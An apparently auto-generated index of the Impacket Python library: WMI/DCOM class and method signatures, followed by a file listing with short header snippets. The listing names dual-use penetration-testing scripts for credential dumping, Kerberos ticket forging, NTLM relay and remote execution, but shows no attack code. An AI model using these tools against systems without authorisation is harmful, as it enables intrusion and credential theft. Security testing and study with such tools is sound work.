class IWbemServices_DeleteInstanceAsync (line 1767) | class IWbemServices_DeleteInstanceAsync(DCOMCALL):
class IWbemServices_DeleteInstanceAsyncResponse (line 1776) | class IWbemServices_DeleteInstanceAsyncResponse(DCOMANSWER):
class IWbemServices_CreateInstanceEnum (line 1782) | class IWbemServices_CreateInstanceEnum(DCOMCALL):
class IWbemServices_CreateInstanceEnumResponse (line 1790) | class IWbemServices_CreateInstanceEnumResponse(DCOMANSWER):
class IWbemServices_CreateInstanceEnumAsync (line 1797) | class IWbemServices_CreateInstanceEnumAsync(DCOMCALL):
class IWbemServices_CreateInstanceEnumAsyncResponse (line 1806) | class IWbemServices_CreateInstanceEnumAsyncResponse(DCOMANSWER):
class IWbemServices_ExecQuery (line 1812) | class IWbemServices_ExecQuery(DCOMCALL):
class IWbemServices_ExecQueryResponse (line 1821) | class IWbemServices_ExecQueryResponse(DCOMANSWER):
class IWbemServices_ExecQueryAsync (line 1828) | class IWbemServices_ExecQueryAsync(DCOMCALL):
class IWbemServices_ExecQueryAsyncResponse (line 1838) | class IWbemServices_ExecQueryAsyncResponse(DCOMANSWER):
class IWbemServices_ExecNotificationQuery (line 1844) | class IWbemServices_ExecNotificationQuery(DCOMCALL):
class IWbemServices_ExecNotificationQueryResponse (line 1853) | class IWbemServices_ExecNotificationQueryResponse(DCOMANSWER):
class IWbemServices_ExecNotificationQueryAsync (line 1860) | class IWbemServices_ExecNotificationQueryAsync(DCOMCALL):
class IWbemServices_ExecNotificationQueryAsyncResponse (line 1870) | class IWbemServices_ExecNotificationQueryAsyncResponse(DCOMANSWER):
class IWbemServices_ExecMethod (line 1876) | class IWbemServices_ExecMethod(DCOMCALL):
class IWbemServices_ExecMethodResponse (line 1888) | class IWbemServices_ExecMethodResponse(DCOMANSWER):
class IWbemServices_ExecMethodAsync (line 1896) | class IWbemServices_ExecMethodAsync(DCOMCALL):
class IWbemServices_ExecMethodAsyncResponse (line 1907) | class IWbemServices_ExecMethodAsyncResponse(DCOMANSWER):
class IEnumWbemClassObject_Reset (line 1914) | class IEnumWbemClassObject_Reset(DCOMCALL):
class IEnumWbemClassObject_ResetResponse (line 1919) | class IEnumWbemClassObject_ResetResponse(DCOMANSWER):
class IEnumWbemClassObject_Next (line 1925) | class IEnumWbemClassObject_Next(DCOMCALL):
class IEnumWbemClassObject_NextResponse (line 1932) | class IEnumWbemClassObject_NextResponse(DCOMANSWER):
class IEnumWbemClassObject_NextAsync (line 1940) | class IEnumWbemClassObject_NextAsync(DCOMCALL):
class IEnumWbemClassObject_NextAsyncResponse (line 1947) | class IEnumWbemClassObject_NextAsyncResponse(DCOMANSWER):
class IEnumWbemClassObject_Clone (line 1953) | class IEnumWbemClassObject_Clone(DCOMCALL):
class IEnumWbemClassObject_CloneResponse (line 1958) | class IEnumWbemClassObject_CloneResponse(DCOMANSWER):
class IEnumWbemClassObject_Skip (line 1965) | class IEnumWbemClassObject_Skip(DCOMCALL):
class IEnumWbemClassObject_SkipResponse (line 1972) | class IEnumWbemClassObject_SkipResponse(DCOMANSWER):
class IWbemCallResult_GetResultObject (line 1979) | class IWbemCallResult_GetResultObject(DCOMCALL):
class IWbemCallResult_GetResultObjectResponse (line 1985) | class IWbemCallResult_GetResultObjectResponse(DCOMANSWER):
class IWbemCallResult_GetResultString (line 1992) | class IWbemCallResult_GetResultString(DCOMCALL):
class IWbemCallResult_GetResultStringResponse (line 1998) | class IWbemCallResult_GetResultStringResponse(DCOMANSWER):
class IWbemCallResult_GetResultServices (line 2005) | class IWbemCallResult_GetResultServices(DCOMCALL):
class IWbemCallResult_GetResultServicesResponse (line 2011) | class IWbemCallResult_GetResultServicesResponse(DCOMANSWER):
class IWbemCallResult_GetCallStatus (line 2018) | class IWbemCallResult_GetCallStatus(DCOMCALL):
class IWbemCallResult_GetCallStatusResponse (line 2024) | class IWbemCallResult_GetCallStatusResponse(DCOMANSWER):
class IWbemFetchSmartEnum_GetSmartEnum (line 2032) | class IWbemFetchSmartEnum_GetSmartEnum(DCOMCALL):
class IWbemFetchSmartEnum_GetSmartEnumResponse (line 2037) | class IWbemFetchSmartEnum_GetSmartEnumResponse(DCOMANSWER):
class IWbemWCOSmartEnum_Next (line 2045) | class IWbemWCOSmartEnum_Next(DCOMCALL):
class IWbemWCOSmartEnum_NextResponse (line 2053) | class IWbemWCOSmartEnum_NextResponse(DCOMANSWER):
class IWbemLoginClientID_SetClientInfo (line 2063) | class IWbemLoginClientID_SetClientInfo(DCOMCALL):
class IWbemLoginClientID_SetClientInfoResponse (line 2071) | class IWbemLoginClientID_SetClientInfoResponse(DCOMANSWER):
class IWbemLoginHelper_SetEvent (line 2078) | class IWbemLoginHelper_SetEvent(DCOMCALL):
class IWbemLoginHelper_SetEventResponse (line 2084) | class IWbemLoginHelper_SetEventResponse(DCOMANSWER):
class IWbemBackupRestore_Backup (line 2092) | class IWbemBackupRestore_Backup(DCOMCALL):
class IWbemBackupRestore_BackupResponse (line 2099) | class IWbemBackupRestore_BackupResponse(DCOMANSWER):
class IWbemBackupRestore_Restore (line 2105) | class IWbemBackupRestore_Restore(DCOMCALL):
class IWbemBackupRestore_RestoreResponse (line 2112) | class IWbemBackupRestore_RestoreResponse(DCOMANSWER):
class IWbemBackupRestoreEx_Pause (line 2119) | class IWbemBackupRestoreEx_Pause(DCOMCALL):
class IWbemBackupRestoreEx_PauseResponse (line 2124) | class IWbemBackupRestoreEx_PauseResponse(DCOMANSWER):
class IWbemBackupRestoreEx_Resume (line 2130) | class IWbemBackupRestoreEx_Resume(DCOMCALL):
class IWbemBackupRestoreEx_ResumeResponse (line 2135) | class IWbemBackupRestoreEx_ResumeResponse(DCOMANSWER):
class IWbemRefreshingServices_AddObjectToRefresher (line 2142) | class IWbemRefreshingServices_AddObjectToRefresher(DCOMCALL):
class IWbemRefreshingServices_AddObjectToRefresherResponse (line 2152) | class IWbemRefreshingServices_AddObjectToRefresherResponse(DCOMANSWER):
class IWbemRefreshingServices_AddObjectToRefresherByTemplate (line 2160) | class IWbemRefreshingServices_AddObjectToRefresherByTemplate(DCOMCALL):
class IWbemRefreshingServices_AddObjectToRefresherByTemplateResponse (line 2170) | class IWbemRefreshingServices_AddObjectToRefresherByTemplateResponse(DCO...
class IWbemRefreshingServices_AddEnumToRefresher (line 2178) | class IWbemRefreshingServices_AddEnumToRefresher(DCOMCALL):
class IWbemRefreshingServices_AddEnumToRefresherResponse (line 2188) | class IWbemRefreshingServices_AddEnumToRefresherResponse(DCOMANSWER):
class IWbemRefreshingServices_RemoveObjectFromRefresher (line 2196) | class IWbemRefreshingServices_RemoveObjectFromRefresher(DCOMCALL):
class IWbemRefreshingServices_RemoveObjectFromRefresherResponse (line 2205) | class IWbemRefreshingServices_RemoveObjectFromRefresherResponse(DCOMANSW...
class IWbemRefreshingServices_GetRemoteRefresher (line 2212) | class IWbemRefreshingServices_GetRemoteRefresher(DCOMCALL):
class IWbemRefreshingServices_GetRemoteRefresherResponse (line 2220) | class IWbemRefreshingServices_GetRemoteRefresherResponse(DCOMANSWER):
class IWbemRefreshingServices_ReconnectRemoteRefresher (line 2229) | class IWbemRefreshingServices_ReconnectRemoteRefresher(DCOMCALL):
class IWbemRefreshingServices_ReconnectRemoteRefresherResponse (line 2239) | class IWbemRefreshingServices_ReconnectRemoteRefresherResponse(DCOMANSWER):
class IWbemRemoteRefresher_RemoteRefresh (line 2248) | class IWbemRemoteRefresher_RemoteRefresh(DCOMCALL):
class IWbemRemoteRefresher_RemoteRefreshResponse (line 2254) | class IWbemRemoteRefresher_RemoteRefreshResponse(DCOMANSWER):
class IWbemRemoteRefresher_StopRefreshing (line 2262) | class IWbemRemoteRefresher_StopRefreshing(DCOMCALL):
class IWbemRemoteRefresher_StopRefreshingResponse (line 2270) | class IWbemRemoteRefresher_StopRefreshingResponse(DCOMANSWER):
class IWbemShutdown_Shutdown (line 2277) | class IWbemShutdown_Shutdown(DCOMCALL):
class IWbemShutdown_ShutdownResponse (line 2285) | class IWbemShutdown_ShutdownResponse(DCOMANSWER):
class IUnsecuredApartment_CreateObjectStub (line 2292) | class IUnsecuredApartment_CreateObjectStub(DCOMCALL):
class IUnsecuredApartment_CreateObjectStubResponse (line 2298) | class IUnsecuredApartment_CreateObjectStubResponse(DCOMANSWER):
class IWbemUnsecuredApartment_CreateSinkStub (line 2306) | class IWbemUnsecuredApartment_CreateSinkStub(DCOMCALL):
class IWbemUnsecuredApartment_CreateSinkStubResponse (line 2314) | class IWbemUnsecuredApartment_CreateSinkStubResponse(DCOMANSWER):
function checkNullString (line 2329) | def checkNullString(string):
class IWbemClassObject (line 2338) | class IWbemClassObject(IRemUnknown):
method __init__ (line 2339) | def __init__(self, interface, iWbemServices = None):
method setClassName (line 2356) | def setClassName(self, value):
method addNewAttribute (line 2362) | def addNewAttribute(self, name, type, default_value=None):
method __getattr__ (line 2369) | def __getattr__(self, attr):
method parseObject (line 2401) | def parseObject(self):
method getObject (line 2404) | def getObject(self):
method getClassName (line 2407) | def getClassName(self):
method printInformation (line 2413) | def printInformation(self):
method getProperties (line 2416) | def getProperties(self):
method getMethods (line 2421) | def getMethods(self):
method __ndEntry (line 2427) | def __ndEntry(index, null_default, inherited_default):
method __createCimTypeQualifierSet (line 2431) | def __createCimTypeQualifierSet(self, heap, propertyInfo):
method marshalMe (line 2454) | def marshalMe(self):
method SpawnInstance (line 2702) | def SpawnInstance(self):
method createProperties (line 2807) | def createProperties(self, properties):
method createMethods (line 2842) | def createMethods(self, classOrInstance, methods):
class IWbemLoginClientID (line 3045) | class IWbemLoginClientID(IRemUnknown):
method __init__ (line 3046) | def __init__(self, interface):
method SetClientInfo (line 3050) | def SetClientInfo(self, wszClientMachine, lClientProcId = 1234):
class IWbemLoginHelper (line 3058) | class IWbemLoginHelper(IRemUnknown):
method __init__ (line 3059) | def __init__(self, interface):
method SetEvent (line 3063) | def SetEvent(self, sEventToSet):
class IWbemWCOSmartEnum (line 3071) | class IWbemWCOSmartEnum(IRemUnknown):
method __init__ (line 3072) | def __init__(self, interface):
method Next (line 3076) | def Next(self, proxyGUID, lTimeout, uCount):
class IWbemFetchSmartEnum (line 3085) | class IWbemFetchSmartEnum(IRemUnknown):
method __init__ (line 3086) | def __init__(self, interface):
method GetSmartEnum (line 3090) | def GetSmartEnum(self, lTimeout):
class IWbemCallResult (line 3096) | class IWbemCallResult(IRemUnknown):
method __init__ (line 3097) | def __init__(self, interface):
method GetResultObject (line 3101) | def GetResultObject(self, lTimeout):
method GetResultString (line 3108) | def GetResultString(self, lTimeout):
method GetResultServices (line 3115) | def GetResultServices(self, lTimeout):
method GetCallStatus (line 3122) | def GetCallStatus(self, lTimeout):
class IEnumWbemClassObject (line 3128) | class IEnumWbemClassObject(IRemUnknown):
method __init__ (line 3129) | def __init__(self, interface, iWbemServices = None):
method Reset (line 3134) | def Reset(self):
method Next (line 3140) | def Next(self, lTimeout, uCount):
method NextAsync (line 3153) | def NextAsync(self, lTimeout, pSink):
method Clone (line 3161) | def Clone(self):
method Skip (line 3167) | def Skip(self, lTimeout, uCount):
class IWbemServices (line 3175) | class IWbemServices(IRemUnknown):
method __init__ (line 3176) | def __init__(self, interface):
method OpenNamespace (line 3180) | def OpenNamespace(self, strNamespace, lFlags=0, pCtx = NULL):
method CancelAsyncCall (line 3189) | def CancelAsyncCall(self,IWbemObjectSink ):
method QueryObjectSink (line 3195) | def QueryObjectSink(self):
method GetObject (line 3202) | def GetObject(self, strObjectPath, lFlags=0, pCtx=NULL):
method GetObjectAsync (line 3219) | def GetObjectAsync(self, strNamespace, lFlags=0, pCtx = NULL):
method PutClass (line 3228) | def PutClass(self, pObject, lFlags=0, pCtx=NULL):
method PutClassAsync (line 3242) | def PutClassAsync(self, pObject, lFlags=0, pCtx=NULL):
method DeleteClass (line 3255) | def DeleteClass(self, strClass, lFlags=0, pCtx=NULL):
method DeleteClassAsync (line 3265) | def DeleteClassAsync(self, strClass, lFlags=0, pCtx=NULL):
method CreateClassEnum (line 3274) | def CreateClassEnum(self, strSuperClass, lFlags=0, pCtx=NULL):
method CreateClassEnumAsync (line 3283) | def CreateClassEnumAsync(self, strSuperClass, lFlags=0, pCtx=NULL):
method PutInstance (line 3292) | def PutInstance(self, pInst, lFlags=0, pCtx=NULL):
method PutInstanceAsync (line 3307) | def PutInstanceAsync(self, pInst, lFlags=0, pCtx=NULL):
method DeleteInstance (line 3316) | def DeleteInstance(self, strObjectPath, lFlags=0, pCtx=NULL):
method DeleteInstanceAsync (line 3326) | def DeleteInstanceAsync(self, strObjectPath, lFlags=0, pCtx=NULL):
method CreateInstanceEnum (line 3335) | def CreateInstanceEnum(self, strSuperClass, lFlags=0, pCtx=NULL):
method CreateInstanceEnumAsync (line 3346) | def CreateInstanceEnumAsync(self, strSuperClass, lFlags=0, pCtx=NULL):
method ExecQuery (line 3355) | def ExecQuery(self, strQuery, lFlags=0, pCtx=NULL):
method ExecQueryAsync (line 3366) | def ExecQueryAsync(self, strQuery, lFlags=0, pCtx=NULL):
method ExecNotificationQuery (line 3376) | def ExecNotificationQuery(self, strQuery, lFlags=0, pCtx=NULL):
method ExecNotificationQueryAsync (line 3387) | def ExecNotificationQueryAsync(self, strQuery, lFlags=0, pCtx=NULL):
method ExecMethod (line 3397) | def ExecMethod(self, strObjectPath, strMethodName, lFlags=0, pCtx=NULL...
method ExecMethodAsync (line 3420) | def ExecMethodAsync(self, strObjectPath, strMethodName, lFlags=0, pCtx...
class IWbemLevel1Login (line 3431) | class IWbemLevel1Login(IRemUnknown):
method __init__ (line 3432) | def __init__(self, interface):
method EstablishPosition (line 3436) | def EstablishPosition(self):
method RequestChallenge (line 3443) | def RequestChallenge(self):
method WBEMLogin (line 3450) | def WBEMLogin(self):
method NTLMLogin (line 3459) | def NTLMLogin(self, wszNetworkResource, wszPreferredLocale, pCtx):
FILE: impacket/dcerpc/v5/dcomrt.py
class DCERPCSessionError (line 102) | class DCERPCSessionError(DCERPCException):
method __init__ (line 103) | def __init__(self, error_string=None, error_code=None, packet=None):
method __str__ (line 106) | def __str__( self ):
class OID_ARRAY (line 120) | class OID_ARRAY(NDRUniConformantArray):
class POID_ARRAY (line 123) | class POID_ARRAY(NDRPOINTER):
class handle_t (line 185) | class handle_t(NDRSTRUCT):
method __init__ (line 191) | def __init__(self, data=None, isNDR64=False):
method isNull (line 195) | def isNull(self):
class COMVERSION (line 199) | class COMVERSION(NDRSTRUCT):
method set_default_version (line 209) | def set_default_version(cls, major_version=None, minor_version=None):
method __init__ (line 216) | def __init__(self, data = None,isNDR64 = False):
class PCOMVERSION (line 222) | class PCOMVERSION(NDRPOINTER):
class BYTE_ARRAY (line 230) | class BYTE_ARRAY(NDRUniConformantArray):
class ORPC_EXTENT (line 233) | class ORPC_EXTENT(NDRSTRUCT):
class PORPC_EXTENT (line 242) | class PORPC_EXTENT(NDRPOINTER):
class EXTENT_ARRAY (line 247) | class EXTENT_ARRAY(NDRUniConformantArray):
class PEXTENT_ARRAY (line 250) | class PEXTENT_ARRAY(NDRPOINTER):
class ORPC_EXTENT_ARRAY (line 255) | class ORPC_EXTENT_ARRAY(NDRSTRUCT):
class PORPC_EXTENT_ARRAY (line 262) | class PORPC_EXTENT_ARRAY(NDRPOINTER):
class ORPCTHIS (line 268) | class ORPCTHIS(NDRSTRUCT):
class ORPCTHAT (line 278) | class ORPCTHAT(NDRSTRUCT):
class MInterfacePointer (line 285) | class MInterfacePointer(NDRSTRUCT):
class PMInterfacePointerInternal (line 292) | class PMInterfacePointerInternal(NDRPOINTER):
class PMInterfacePointer (line 298) | class PMInterfacePointer(NDRPOINTER):
class PPMInterfacePointer (line 303) | class PPMInterfacePointer(NDRPOINTER):
class OBJREF (line 309) | class OBJREF(NDRSTRUCT):
method __init__
Condensed preview — 350 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (9,096K chars).
[
{
"path": ".github/ISSUE_TEMPLATE/bug_report.md",
"chars": 1155,
"preview": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n### Configuratio"
},
{
"path": ".github/labeler.yml",
"chars": 437,
"preview": "# Rules to label Pull Requests\nversion: 1\nlabels:\n - label: \"Examples\"\n files:\n - \"examples/.*\"\n - label: \"Lib"
},
{
"path": ".github/workflows/build_and_test.yml",
"chars": 2517,
"preview": "# GitHub Action workflow to build and run Impacket's tests\n#\n\nname: Build and test Impacket\n\non: [push, pull_request]\n\ne"
},
{
"path": ".github/workflows/labeler.yml",
"chars": 247,
"preview": "# GitHub Action workflow to label Pull Requests\n#\n\nname: Label PRs\n\non:\n - pull_request\n\njobs:\n build:\n runs-on: ub"
},
{
"path": ".gitignore",
"chars": 844,
"preview": "# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n\n# C extensions\n*.so\n\n# Distribution / packaging\n.Python\n"
},
{
"path": "ChangeLog.md",
"chars": 53823,
"preview": "# ChangeLog\n\nProject owner's main page is at www.coresecurity.com.\n\nComplete list of changes can be found at:\nhttps://gi"
},
{
"path": "Dockerfile",
"chars": 447,
"preview": "FROM python:3.13-alpine as compile\nWORKDIR /opt\nRUN apk add --no-cache git gcc musl-dev python3-dev libffi-dev openssl-d"
},
{
"path": "LICENSE",
"chars": 8376,
"preview": "Licencing\n---------\n\nWe provide this software under a slightly modified version of the\nApache Software License. The only"
},
{
"path": "MANIFEST.in",
"chars": 227,
"preview": "include MANIFEST.in\ninclude LICENSE\ninclude ChangeLog.md\ninclude README.md\ninclude SECURITY.md\ninclude TESTING.md\n\ninclu"
},
{
"path": "README.md",
"chars": 4846,
"preview": "<img width=\"2043\" height=\"571\" alt=\"Impacket_light\" src=\"https://github.com/user-attachments/assets/14aed700-0c6e-4865-a"
},
{
"path": "SECURITY.md",
"chars": 320,
"preview": "Security Policy\n===============\n\nAlthough this initiative is not meant to be used in productive environments,\nif you con"
},
{
"path": "TESTING.md",
"chars": 10768,
"preview": "Testing\n=======\n\nThe library leverages the [pytest](https://docs.pytest.org/) framework for organizing\nand marking test "
},
{
"path": "examples/CheckLDAPStatus.py",
"chars": 5511,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/DumpNTLMInfo.py",
"chars": 29328,
"preview": "#!/usr/bin/env python\r\n# Impacket - Collection of Python classes for working with network protocols.\r\n#\r\n# Copyright For"
},
{
"path": "examples/Get-GPPPassword.py",
"chars": 14601,
"preview": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortr"
},
{
"path": "examples/GetADComputers.py",
"chars": 11917,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/GetADUsers.py",
"chars": 9291,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/GetLAPSPassword.py",
"chars": 14930,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/GetNPUsers.py",
"chars": 19841,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/GetUserSPNs.py",
"chars": 27511,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/addcomputer.py",
"chars": 22139,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/atexec.py",
"chars": 12705,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/attrib.py",
"chars": 17946,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/badsuccessor.py",
"chars": 34360,
"preview": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortr"
},
{
"path": "examples/changepasswd.py",
"chars": 38984,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/dacledit.py",
"chars": 41635,
"preview": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortr"
},
{
"path": "examples/dcomexec.py",
"chars": 28603,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/describeTicket.py",
"chars": 37829,
"preview": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortr"
},
{
"path": "examples/dpapi.py",
"chars": 30461,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/esentutl.py",
"chars": 3465,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/exchanger.py",
"chars": 42137,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/filetime.py",
"chars": 14756,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/findDelegation.py",
"chars": 14149,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/getArch.py",
"chars": 4271,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/getPac.py",
"chars": 13389,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/getST.py",
"chars": 46910,
"preview": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortr"
},
{
"path": "examples/getTGT.py",
"chars": 5841,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/goldenPac.py",
"chars": 48984,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/karmaSMB.py",
"chars": 28637,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/keylistattack.py",
"chars": 12301,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/kintercept.py",
"chars": 10131,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/lookupsid.py",
"chars": 8147,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/machine_role.py",
"chars": 7268,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/mimikatz.py",
"chars": 9156,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/mqtt_check.py",
"chars": 2873,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/mssqlclient.py",
"chars": 5307,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/mssqlinstance.py",
"chars": 1781,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/net.py",
"chars": 28089,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/netview.py",
"chars": 22268,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/ntfs-read.py",
"chars": 49830,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/ntlmrelayx.py",
"chars": 33311,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/owneredit.py",
"chars": 14903,
"preview": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortr"
},
{
"path": "examples/ping.py",
"chars": 2675,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/ping6.py",
"chars": 2539,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/psexec.py",
"chars": 30158,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/raiseChild.py",
"chars": 61638,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/rbcd.py",
"chars": 15082,
"preview": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortr"
},
{
"path": "examples/rdp_check.py",
"chars": 23444,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/reg.py",
"chars": 32499,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/registry-read.py",
"chars": 5476,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/regsecrets.py",
"chars": 11457,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright (C) 20"
},
{
"path": "examples/rpcdump.py",
"chars": 8141,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/rpcmap.py",
"chars": 16687,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/sambaPipe.py",
"chars": 12446,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/samedit.py",
"chars": 4062,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright (C) 20"
},
{
"path": "examples/samrdump.py",
"chars": 10569,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/secretsdump.py",
"chars": 29586,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/services.py",
"chars": 16884,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/smbclient.py",
"chars": 5212,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/smbexec.py",
"chars": 16690,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/smbserver.py",
"chars": 7635,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/sniff.py",
"chars": 3329,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/sniffer.py",
"chars": 2314,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/split.py",
"chars": 4649,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/ticketConverter.py",
"chars": 3352,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/ticketer.py",
"chars": 63156,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/tstool.py",
"chars": 37109,
"preview": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortr"
},
{
"path": "examples/wmiexec.py",
"chars": 19694,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/wmipersist.py",
"chars": 12071,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "examples/wmiquery.py",
"chars": 8960,
"preview": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra"
},
{
"path": "impacket/Dot11Crypto.py",
"chars": 1183,
"preview": "# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliat"
},
{
"path": "impacket/Dot11KeyManager.py",
